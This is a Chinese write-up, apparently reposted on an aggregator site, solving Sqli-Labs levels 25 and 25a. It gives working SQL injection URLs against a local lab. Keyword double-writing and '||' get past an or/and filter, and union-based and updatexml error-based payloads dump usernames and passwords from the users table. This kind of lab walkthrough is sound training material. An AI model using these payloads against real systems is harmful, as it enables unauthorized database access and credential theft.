Sqli-Labs less25-25a

Posted n0r4h

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Sqli-Labs less25-25a相关的知识,希望对你有一定的参考价值。

less-25

 

前置基础知识:后面的关卡涉及到WAF绕过:

主要有三种方式:白盒绕过、黑盒绕过、fuzz测试

网上sql注入WAF绕过的教程有很多,可以自己查询,总之就是比谁思路猥琐

 

根据第25关下面的提示和代码,我们发现他对or和and(不区分大小写)转义成了空格

 

 

 

第一种办法:

采用双写的方式

这里就直接最后一步了,几个步骤都相同:http://192.168.5.100/sqli-labs/Less-25/?id=0\' union select 1,2,group_concat(concat_ws(\'-\',username,passwoorrd)) from security.users --+(注意password中or双写)

 

 

 

第二种方法:or->|| 基于报错的注入

http://192.168.5.100/sqli-labs/Less-25/?id=0\' || updatexml(1,concat(0x7e,(select schema_name from infoorrmation_schema.schemata limit 0,1),0x7e),1)--+

遍历爆出所有的数据,继续使用即可,这里不可以使用group_concat(),因为数据显示不完整

 

 

 

 

 

 

 

less-25a

通过观察,上一关有’‘包裹,这一关没有任何包裹,并且也是转义or和and

:http://192.168.5.100/sqli-labs/Less-25a/?id=-1 union select 1,2,group_concat(concat_ws(0x7e,username,passwoorrd)) from security.users--+

 

 

 

 

 

以上是关于Sqli-Labs less25-25a的主要内容,如果未能解决你的问题,请参考以下文章

sqli-labs通关(less31~less40)

SQLI-LABS 靶场通过小记(39~53)

SQLI-LABS 靶场通过小记(39~53)

SQLI-LABS 靶场通过小记(39~53)

sqli-labs:Less-22

sqli-labs Less38-Less41